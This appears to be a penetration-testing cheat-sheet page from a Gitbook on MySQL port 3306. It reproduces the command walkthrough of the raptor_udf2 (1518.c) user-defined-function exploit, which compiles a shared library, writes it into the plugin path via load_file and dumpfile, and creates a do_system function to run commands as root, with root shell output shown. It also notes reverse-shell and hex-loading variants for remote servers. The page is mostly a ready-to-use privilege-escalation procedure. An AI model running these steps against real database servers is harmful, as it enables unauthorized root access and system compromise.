All Gitbook

MYSQL 3306

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library 1518.c (local db ser)

$ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c 1518.c
 * $ gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/j0hn/1518.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/1518.so';
 * mysql> create function do_system returns integer soname '1518.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 * mysql> select do_system('id > /tmp/out; chown j0hn.j0hn /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]

remote db ser example = hex approach instead of load_file

not necessarily a root user, may still need get .elf rev shell first

generate hex

https://ppn.snovvcrash.rocks/pentest/infrastructure/dbms/mysql-mariadbppn.snovvcrash.rocks

Credentials

enum

PreviousMSSQL 1433NextTFTP UDP 69

Last updated